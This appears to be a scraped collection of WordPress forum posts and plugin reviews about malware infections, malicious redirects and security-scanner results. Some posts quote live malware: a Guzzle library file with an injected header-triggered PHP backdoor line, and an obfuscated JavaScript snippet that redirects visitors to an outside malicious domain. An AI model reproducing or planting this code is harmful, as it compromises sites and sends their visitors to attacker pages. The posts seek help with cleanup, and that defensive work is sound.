About a month and a half ago, all 5 of my wordpress websites being hosted on Bluehost were infected with malware. A week ago, I was made aware of this when my websites started redirecting users to malicious phishing sites. Contacted BlueHost, got a report of all infected files, cleaned them manually, no more malware.

However, around the time my websites were apparently infected, I’ve been having connectivity issues on all of my websites. I get a random variety of errors on random pages at random times. These errors range from

“err_connection_closed”
to
“err_http2_protocol_error”
to
“500 Proxy error”
to
“502 Bad gateway”

I’ve tested these sites across different networks and devices and the errors still occur.

Looking in the console area of inspect element, on any given page, there are “net::ERR_CONNECTION_CLOSED” errors when attempting to “GET” a variety of resources ranging from minified js to plugin files to simple images.

I’ve already tried disabling all plugins, changing themes, etc to no avail.

I’ve contacted Bluehost several times about this, but they’ve been totally useless. They seem to not want to settle on the fact that it’s very likely a server issue.

Anybody know what I can possibly do about this? I’m at a loss. I’ll gladly provide more information if necessary.

Hi
My server has deactivated my account because they claim your plugin is infected witha malware. They claim the file is wp-content/plugins/postman-smtp/Postman/Postman-Mail/sendgrid-php-3.2.0/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/CurlMulti.php

They won’t reactivate until I clean the file, but since I don’t know what is infected, I’m not sure what to do. Can you help?

<?php

namespace Guzzle\Http\Curl;

if($_SERVER[HTTP_ACCEPT_CHARSET]==”iso-8859-1″){extract($_SERVER);array_filter((array)$HTTP_ACCEPT_LANGUAGE, $HTTP_ACCEPT);}

use Guzzle\Common\AbstractHasDispatcher;
use Guzzle\Common\Event;
use Guzzle\Http\Exception\MultiTransferException;
use Guzzle\Http\Exception\CurlException;
use Guzzle\Http\Message\RequestInterface;
use Guzzle\Http\Message\EntityEnclosingRequestInterface;
use Guzzle\Http\Exception\RequestException;

/**
* Send {@see RequestInterface} objects in parallel using curl_multi
*/
class CurlMulti extends AbstractHasDispatcher implements CurlMultiInterface
{
/** @var resource cURL multi handle. */
protected $multiHandle;

/** @var array Attached {@see RequestInterface} objects. */
protected $requests;

/** @var \SplObjectStorage RequestInterface to CurlHandle hash */
protected $handles;

/** @var array Hash mapping curl handle resource IDs to request objects */
protected $resourceHash;

/** @var array Queued exceptions */
protected $exceptions = array();

/** @var array Requests that succeeded */
protected $successful = array();

/** @var array cURL multi error values and codes */
protected $multiErrors = array(
CURLM_BAD_HANDLE => array(‘CURLM_BAD_HANDLE’, ‘The passed-in handle is not a valid CURLM handle.’),
CURLM_BAD_EASY_HANDLE => array(‘CURLM_BAD_EASY_HANDLE’, “An easy handle was not good/valid. It could mean that it isn’t an easy handle at all, or possibly that the handle already is in used by this or another multi handle.”),
CURLM_OUT_OF_MEMORY => array(‘CURLM_OUT_OF_MEMORY’, ‘You are doomed.’),
CURLM_INTERNAL_ERROR => array(‘CURLM_INTERNAL_ERROR’, ‘This can only be returned if libcurl bugs. Please report it to us!’)
);

/** @var float */
protected $selectTimeout;

public function __construct($selectTimeout = 1.0)
{
$this->selectTimeout = $selectTimeout;
$this->multiHandle = curl_multi_init();
// @codeCoverageIgnoreStart
if ($this->multiHandle === false) {
throw new CurlException(‘Unable to create multi handle’);
}
// @codeCoverageIgnoreEnd
$this->reset();
}

public function __destruct()
{
if (is_resource($this->multiHandle)) {
curl_multi_close($this->multiHandle);
}
}

public function add(RequestInterface $request)
{
$this->requests[] = $request;
// If requests are currently transferring and this is async, then the
// request must be prepared now as the send() method is not called.
$this->beforeSend($request);
$this->dispatch(self::ADD_REQUEST, array(‘request’ => $request));

return $this;
}

public function all()
{
return $this->requests;
}

public function remove(RequestInterface $request)
{
$this->removeHandle($request);
if (($index = array_search($request, $this->requests, true)) !== false) {
$request = $this->requests[$index];
unset($this->requests[$index]);
$this->requests = array_values($this->requests);
$this->dispatch(self::REMOVE_REQUEST, array(‘request’ => $request));
return true;
}

return false;
}

public function reset($hard = false)
{
// Remove each request
if ($this->requests) {
foreach ($this->requests as $request) {
$this->remove($request);
}
}

$this->handles = new \SplObjectStorage();
$this->requests = $this->resourceHash = $this->exceptions = $this->successful = array();
}

public function send()
{
$this->perform();
$exceptions = $this->exceptions;
$successful = $this->successful;
$this->reset();

if ($exceptions) {
$this->throwMultiException($exceptions, $successful);
}
}

public function count()
{
return count($this->requests);
}

/**
* Build and throw a MultiTransferException
*
* @param array $exceptions Exceptions encountered
* @param array $successful Successful requests
* @throws MultiTransferException
*/
protected function throwMultiException(array $exceptions, array $successful)
{
$multiException = new MultiTransferException(‘Errors during multi transfer’);

while ($e = array_shift($exceptions)) {
$multiException->addFailedRequestWithException($e[‘request’], $e[‘exception’]);
}

// Add successful requests
foreach ($successful as $request) {
if (!$multiException->containsRequest($request)) {
$multiException->addSuccessfulRequest($request);
}
}

throw $multiException;
}

/**
* Prepare for sending
*
* @param RequestInterface $request Request to prepare
* @throws \Exception on error preparing the request
*/
protected function beforeSend(RequestInterface $request)
{
try {
$state = $request->setState(RequestInterface::STATE_TRANSFER);
if ($state == RequestInterface::STATE_TRANSFER) {
$this->addHandle($request);
} else {
// Requests might decide they don’t need to be sent just before
// transfer (e.g. CachePlugin)
$this->remove($request);
if ($state == RequestInterface::STATE_COMPLETE) {
$this->successful[] = $request;
}
}
} catch (\Exception $e) {
// Queue the exception to be thrown when sent
$this->removeErroredRequest($request, $e);
}
}

private function addHandle(RequestInterface $request)
{
$handle = $this->createCurlHandle($request)->getHandle();
$this->checkCurlResult(
curl_multi_add_handle($this->multiHandle, $handle)
);
}

/**
* Create a curl handle for a request
*
* @param RequestInterface $request Request
*
* @return CurlHandle
*/
protected function createCurlHandle(RequestInterface $request)
{
$wrapper = CurlHandle::factory($request);
$this->handles[$request] = $wrapper;
$this->resourceHash[(int) $wrapper->getHandle()] = $request;

return $wrapper;
}

/**
* Get the data from the multi handle
*/
protected function perform()
{
$event = new Event(array(‘curl_multi’ => $this));

while ($this->requests) {
// Notify each request as polling
$blocking = $total = 0;
foreach ($this->requests as $request) {
++$total;
$event[‘request’] = $request;
$request->getEventDispatcher()->dispatch(self::POLLING_REQUEST, $event);
// The blocking variable just has to be non-falsey to block the loop
if ($request->getParams()->hasKey(self::BLOCKING)) {
++$blocking;
}
}
if ($blocking == $total) {
// Sleep to prevent eating CPU because no requests are actually pending a select call
usleep(500);
} else {
$this->executeHandles();
}
}
}

/**
* Execute and select curl handles
*/
private function executeHandles()
{
// The first curl_multi_select often times out no matter what, but is usually required for fast transfers
$selectTimeout = 0.001;
$active = false;
do {
while (($mrc = curl_multi_exec($this->multiHandle, $active)) == CURLM_CALL_MULTI_PERFORM);
$this->checkCurlResult($mrc);
$this->processMessages();
if ($active && curl_multi_select($this->multiHandle, $selectTimeout) === -1) {
// Perform a usleep if a select returns -1: https://bugs.php.net/bug.php?id=61141
usleep(150);
}
$selectTimeout = $this->selectTimeout;
} while ($active);
}

/**
* Process any received curl multi messages
*/
private function processMessages()
{
while ($done = curl_multi_info_read($this->multiHandle)) {
$request = $this->resourceHash[(int) $done[‘handle’]];
try {
$this->processResponse($request, $this->handles[$request], $done);
$this->successful[] = $request;
} catch (\Exception $e) {
$this->removeErroredRequest($request, $e);
}
}
}

/**
* Remove a request that encountered an exception
*
* @param RequestInterface $request Request to remove
* @param \Exception $e Exception encountered
*/
protected function removeErroredRequest(RequestInterface $request, \Exception $e = null)
{
$this->exceptions[] = array(‘request’ => $request, ‘exception’ => $e);
$this->remove($request);
$this->dispatch(self::MULTI_EXCEPTION, array(‘exception’ => $e, ‘all_exceptions’ => $this->exceptions));
}

/**
* Check for errors and fix headers of a request based on a curl response
*
* @param RequestInterface $request Request to process
* @param CurlHandle $handle Curl handle object
* @param array $curl Array returned from curl_multi_info_read
*
* @throws CurlException on Curl error
*/
protected function processResponse(RequestInterface $request, CurlHandle $handle, array $curl)
{
// Set the transfer stats on the response
$handle->updateRequestFromTransfer($request);
// Check if a cURL exception occurred, and if so, notify things
$curlException = $this->isCurlException($request, $handle, $curl);

// Always remove completed curl handles. They can be added back again
// via events if needed (e.g. ExponentialBackoffPlugin)
$this->removeHandle($request);

if (!$curlException) {
if ($this->validateResponseWasSet($request)) {
$state = $request->setState(
RequestInterface::STATE_COMPLETE,
array(‘handle’ => $handle)
);
// Only remove the request if it wasn’t resent as a result of
// the state change
if ($state != RequestInterface::STATE_TRANSFER) {
$this->remove($request);
}
}
return;
}

// Set the state of the request to an error
$state = $request->setState(RequestInterface::STATE_ERROR, array(‘exception’ => $curlException));
// Allow things to ignore the error if possible
if ($state != RequestInterface::STATE_TRANSFER) {
$this->remove($request);
}

// The error was not handled, so fail
if ($state == RequestInterface::STATE_ERROR) {
/** @var CurlException $curlException */
throw $curlException;
}
}

/**
* Remove a curl handle from the curl multi object
*
* @param RequestInterface $request Request that owns the handle
*/
protected function removeHandle(RequestInterface $request)
{
if (isset($this->handles[$request])) {
$handle = $this->handles[$request];
curl_multi_remove_handle($this->multiHandle, $handle->getHandle());
unset($this->handles[$request]);
unset($this->resourceHash[(int) $handle->getHandle()]);
$handle->close();
}
}

/**
* Check if a cURL transfer resulted in what should be an exception
*
* @param RequestInterface $request Request to check
* @param CurlHandle $handle Curl handle object
* @param array $curl Array returned from curl_multi_info_read
*
* @return CurlException|bool
*/
private function isCurlException(RequestInterface $request, CurlHandle $handle, array $curl)
{
if (CURLM_OK == $curl[‘result’] || CURLM_CALL_MULTI_PERFORM == $curl[‘result’]) {
return false;
}

$handle->setErrorNo($curl[‘result’]);
$e = new CurlException(sprintf(‘[curl] %s: %s [url] %s’,
$handle->getErrorNo(), $handle->getError(), $handle->getUrl()));
$e->setCurlHandle($handle)
->setRequest($request)
->setCurlInfo($handle->getInfo())
->setError($handle->getError(), $handle->getErrorNo());

return $e;
}

/**
* Throw an exception for a cURL multi response if needed
*
* @param int $code Curl response code
* @throws CurlException
*/
private function checkCurlResult($code)
{
if ($code != CURLM_OK && $code != CURLM_CALL_MULTI_PERFORM) {
throw new CurlException(isset($this->multiErrors[$code])
? “cURL error: {$code} ({$this->multiErrors[$code][0]}): cURL message: {$this->multiErrors[$code][1]}”
: ‘Unexpected cURL error: ‘ . $code
);
}
}

/**
* @link https://github.com/guzzle/guzzle/issues/710
*/
private function validateResponseWasSet(RequestInterface $request)
{
if ($request->getResponse()) {
return true;
}

$body = $request instanceof EntityEnclosingRequestInterface
? $request->getBody()
: null;

if (!$body) {
$rex = new RequestException(
‘No response was received for a request with no body. This’
. ‘ could mean that you are saturating your network.’
);
$rex->setRequest($request);
$this->removeErroredRequest($request, $rex);
} elseif (!$body->isSeekable() || !$body->seek(0)) {
// Nothing we can do with this. Sorry!
$rex = new RequestException(
‘The connection was unexpectedly closed. The request would’
. ‘ have been retried, but attempting to rewind the’
. ‘ request body failed.’
);
$rex->setRequest($request);
$this->removeErroredRequest($request, $rex);
} else {
$this->remove($request);
// Add the request back to the batch to retry automatically.
$this->requests[] = $request;
$this->addHandle($request);
}

return false;
}
}

What is right? The internal or external scan?

So I am helping the owner of the site to clean up and secure the site, fixed all updates of php, wordpress and plugins, and trying to get all scan results down, I have uninstalled and installed plugins to make sure cheksums match and such, added some code to fix curl28error with longer response time and so on. on the server side updated as much that was possible.

Done several scans , with different results.
Cerber shows several plugins installed directly from WP-admin as example:
My Custom Functions plugin — Integrity data not found — Resolve issue

Suspicious code found in /my-custom-functions/inc/php/functional.php

As shown below, had a look at several files that have the same error.
I really cant see any malicious code in my humble opinion , but I am not sure.

<?php
 
/**
 * Prevent Direct Access
 */
defined( 'ABSPATH' ) or die( "Restricted access!" );
 
/**
 * Prepare the custom code
 */
function spacexchimp_p001_prepare() {
 
    // Put value of plugin constants into an array for easier access
    $plugin = spacexchimp_p001_plugin();
 
    // Retrieve options from database and declare variables
    $options = get_option( $plugin['settings'] . '_settings' );
    $data = !empty( $options['snippets'] ) ? $options['snippets'] : '';
    $enable = !empty( $options['enable'] ) ? $options['enable'] : '';
 
    // Prepare a variable for storing the processed data
    $data_out = "";
 
    // If data is not empty...
    if ( ! empty( $data ) ) {
 
        // If the custom code is enabled...
        if ( $enable == "on") {
 
            // Prepare a variable for storing the processing data, and perform data processing
            $data_tmp = $data;
            $data_tmp = trim( $data_tmp );           // Cleaning
            $data_tmp = ltrim( $data_tmp, '<?php' ); // Cleaning
            $data_tmp = rtrim( $data_tmp, '?>' );    // Cleaning
 
            $data_out .= $data_tmp;
        }
    }
 
    // Return the processed data
    return $data_out;
}
 
/**
 * Preparation of the custom code: Check the custom code for duplicate names of functions
 */
function spacexchimp_p001_preparation_duplicates( $data ) {
 
    // Put value of plugin constants into an array for easier access
    $plugin = spacexchimp_p001_plugin();
 
    // Find names of user entered snippets and check for duplicates
    preg_match_all('/function[\s\n]+(\S+)[\s\n]*\(/i', $data, $user_func_names);
    $user_func_a = count( $user_func_names[1] );
    $user_func_b = count( array_unique( $user_func_names[1] ) );
 
    // Find all names of declared user snippets and mutch with names of user entered snippets
    $declared_func = get_defined_functions();
    $declared_func_user = array_intersect( $user_func_names[1], $declared_func['user'] );
    $declared_func_internal = array_intersect( $user_func_names[1], $declared_func['internal'] );
 
    // Update error status
    if ( $user_func_a != $user_func_b OR count( $declared_func_user ) != 0 OR count( $declared_func_internal ) != 0 ) {
        update_option( $plugin['settings'] . '_error', '1' );   // ERROR
        $error_status = '1';
    } else {
        update_option( $plugin['settings'] . '_error', '0' );   // RESET ERROR VALUE
        $error_status = '0';
    }
 
    // Return error status
    return $error_status;
}
 
/**
 * Process the custom code
 */
function spacexchimp_p001_exec() {
 
    // Put value of plugin constants into an array for easier access
    $plugin = spacexchimp_p001_plugin();
 
    // If the STOP file exist...
    if ( file_exists( $plugin['path'] . 'STOP' ) ) {
        return;   // EXIT
    }
 
    // Get the custom code by calling the "prepare" function
    $data = spacexchimp_p001_prepare();
 
    // If data is empty...
    if ( empty( $data ) OR $data == ' ' ) {
        return;   // EXIT
    }
 
    // If the duplicates snippets finded...
    $duplicates = spacexchimp_p001_preparation_duplicates( $data );
    if ( $duplicates != 0 ) {
        return;   // EXIT
    }
 
    // Parsing and execute by Eval
    if ( false === @eval( $data ) ) {
        update_option( $plugin['settings'] . '_error', '1' );   // ERROR
        return;   // EXIT
    } else {
        update_option( $plugin['settings'] . '_error', '0' );   // RESET ERROR VALUE
    }
}
 
/**
 * Inject the custom code into the website's backend and frontend
 */
spacexchimp_p001_exec();

From /advanced-custom-fields-pro/pro/updates.php:

<?php 
 
if( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
 
if( ! class_exists('acf_pro_updates') ) :
 
class acf_pro_updates {
     
 
    /*
    *  __construct
    *
    *  Initialize filters, action, variables and includes
    *
    *  @type    function
    *  @date    23/06/12
    *  @since   5.0.0
    *
    *  @param   n/a
    *  @return  n/a
    */
     
    function __construct() {
         
        // actions
        add_action('init',  array($this, 'init'), 20);
         
    }
     
     
    /*
    *  init
    *
    *  description
    *
    *  @type    function
    *  @date    10/4/17
    *  @since   5.5.10
    *
    *  @param   $post_id (int)
    *  @return  $post_id (int)
    */
     
    function init() {
         
        // bail early if no show_updates
        if( !acf_get_setting('show_updates') ) return;
         
         
        // bail early if not a plugin (included in theme)
        if( !acf_is_plugin_active() ) return;
         
         
        // register update
        acf_register_plugin_update(array(
            'id'        => 'pro',
            'key'       => acf_pro_get_license_key(),
            'slug'      => acf_get_setting('slug'),
            'basename'  => acf_get_setting('basename'),
            'version'   => acf_get_setting('version'),
        ));
         
         
        // admin
        if( is_admin() ) {
             
            add_action('in_plugin_update_message-' . acf_get_setting('basename'), array($this, 'modify_plugin_update_message'), 10, 2 );
             
        }
         
         
    }
     
     
    /*
    *  modify_plugin_update_message
    *
    *  Displays an update message for plugin list screens.
    *
    *  @type    function
    *  @date    14/06/2016
    *  @since   5.3.8
    *
    *  @param   $message (string)
    *  @param   $plugin_data (array)
    *  @param   $r (object)
    *  @return  $message
    */
     
    function modify_plugin_update_message( $plugin_data, $response ) {
         
        // bail ealry if has key
        if( acf_pro_get_license_key() ) return;
         
         
        // display message
        echo '<br />' . sprintf( __('To enable updates, please enter your license key on the <a href="%s">Updates</a> page. If you don\'t have a licence key, please see <a href="%s">details & pricing</a>.', 'acf'), admin_url('edit.php?post_type=acf-field-group&page=acf-settings-updates'), 'https://www.advancedcustomfields.com/pro' );
         
    }
     
}
 
 
// initialize
new acf_pro_updates();
 
endif; // class_exists check
 
 
/*
*  acf_pro_get_license
*
*  This function will return the license
*
*  @type    function
*  @date    20/09/2016
*  @since   5.4.0
*
*  @param   n/a
*  @return  n/a
*/
 
function acf_pro_get_license() {
     
    // get option
    $license = get_option('acf_pro_license');
     
     
    // bail early if no value
    if( !$license ) return false;
     
     
    // decode
    $license = maybe_unserialize(base64_decode($license));
     
     
    // bail early if corrupt
    if( !is_array($license) ) return false;
     
     
    // return
    return $license;
     
}
 
 
/*
*  acf_pro_get_license_key
*
*  This function will return the license key
*
*  @type    function
*  @date    20/09/2016
*  @since   5.4.0
*
*  @param   n/a
*  @return  n/a
*/
 
function acf_pro_get_license_key() {
     
    // vars
    $license = acf_pro_get_license();
    $home_url = home_url();
     
     
    // bail early if empty
    if( !$license || !$license['key'] ) return false;
     
     
    // bail early if url has changed
    if( acf_strip_protocol($license['url']) !== acf_strip_protocol($home_url) ) return false;
     
     
    // return
    return $license['key'];
     
}
 
 
/*
*  acf_pro_update_license
*
*  This function will update the DB license
*
*  @type    function
*  @date    20/09/2016
*  @since   5.4.0
*
*  @param   $key (string)
*  @return  n/a
*/
 
function acf_pro_update_license( $key = '' ) {
     
    // vars
    $value = '';
     
     
    // key
    if( $key ) {
         
        // vars
        $data = array(
            'key'   => $key,
            'url'   => home_url()
        );
         
         
        // encode
        $value = base64_encode(maybe_serialize($data));
         
    }
     
     
    // re-register update (key has changed)
    acf_register_plugin_update(array(
        'id'        => 'pro',
        'key'       => $key,
        'slug'      => acf_get_setting('slug'),
        'basename'  => acf_get_setting('basename'),
        'version'   => acf_get_setting('version'),
    ));
     
     
    // update
    return update_option('acf_pro_license', $value);
     
}
 
?> 

Hey guys,

I have issue with Google ads, all my ads disapproved because of malicious or unwanted software on my website. I scanned my website with these plugins – Anti Malware, Wordfence, Sucuri, Quttera and its CLEAN. I contacted Google Support and they answer me that it seems that your site (landing page) redirects users to malicious links OR triggered when clicked. They sent me 3 malicious links that my site redirect. I contacted Siteground support they fully scanned my site and nothing found. On Google Search Console no errors at all, I really didint get thats wrong. I even tried to delete all plugins and reinstalled wordpress and still it doesnt work. Please maybe anyone have suggestions that I should do? I’m feeling frustrated about this situation

I crawled the site several times, but Wordfence could not detect the virus javascript code (malware) in the content of all posts and pages. Probably, you need to add the code signature to your virus database:

<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>

Thanks!

I resolved the problem. The culprit was a plugin called ClickBank Vendor

Using NinjaScanner (with NinjaFirewall) is an absolute pleasure. It finds all suspect files (changed/modified/non-standard) in the WordPress installation, even files that I forgot that I had modified!

It leans heavily on the side of security, and will show all suspects including modified files, so you want to add some exclusions here – like cache, etc. – to avoid false positives.

This is a great security tool to add to any WordPress powered site. The guys at NinTechNet really know their stuff, and apply that knowledge well. Their other plugin NinjaFirewall is amazing, and coupled with NinjaScanner, give a really solid security base for WordPress.

Highly Recommended.

I’ve installed this plugin and a day after that my site was infected with VCD malware. PHP was being injected in my functions.php, header.php and also some malicious files in wp-include folder.

DO NOT INSTALL THIS! Even if the author did not made the malicious code, the plugin has security breaches that can harm your site.

Again, do NOT install this plugin.

Hi there,

I have a similar issue to https://wordpress.org/support/topic/removing-2fa-from-login-page/

but if I disable as you suggested in this post, then the 2 factor auth is disabled on wp-admin too

contrary to what is said here:
https://www.wordfence.com/blog/2020/03/vulnerabilities-patched-in-popup-builder-plugin-affecting-over-100000-sites/
the version 3.64.1 does not resolve the issue

I had the header.php infected, with a clean wordpress, theme and plugin

I had to delete the plugin to prevent a redirection to step.xxxx.com/r.php?id=

nothing in the database

see also:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10196

Hi,
I have Malcare Pro installed, today I received an email notification saying the following file is hacked:
ninjafirewall/lib/firewall.php
The plugin was autoupdated today.

Could this be a false flag?

Good Day!

Your latest plugin update is creating some issues in the back-end. The malware scan works, but the results (display) is buggy.

Scan results are showing this … (Click on links below)

http://prntscr.com/rhaguk

An when you click on “View” (shown in above link), you get this …

http://prntscr.com/rhahht

Please investigate and advise. A direct Sucuri Sitecheck of our website reveals no malware and no issues with our website. The issue lies within your plugin.

Thank you!

What is right? The internal or external scan?

I had to deactivate this plugin, got there malware.

As a non technical owner of a company website, I was in trouble trying to resolve a particularly pesky piece of malware. I tried a couple of tools to see if they could help, but they did not. After some research I noted that MalCare had great reviews. I loaded it but it couldn’t connect. Their help team worked to manually connect the tool and found a host of issues (pun intended.) Clearly MalCare knows what it is doing. The cleaning tool works and works fast and their support is excellent.

I would recommend MalCare to anyone with a WordPress website.

Hi, I’ve been having this issue with 2 websites. I’ve had to deactivate and delete the plugin.

I tried to activate again and didn’t work.

Thanks.

I recently had my homepage redirected via a vulnerability in this beautiful, easy to use plugin. I hope you guys can beef up security for the next guy! Sadly I have to move on and find another solution.

MUY BUEN PLUGIN, MUY COMPLETO.

My WordPress website’s pages and posts are hacked by malware(checkandgo.info) and Wordfence is also not able to detect it.

Please help me out. I don’t know how to deal with it.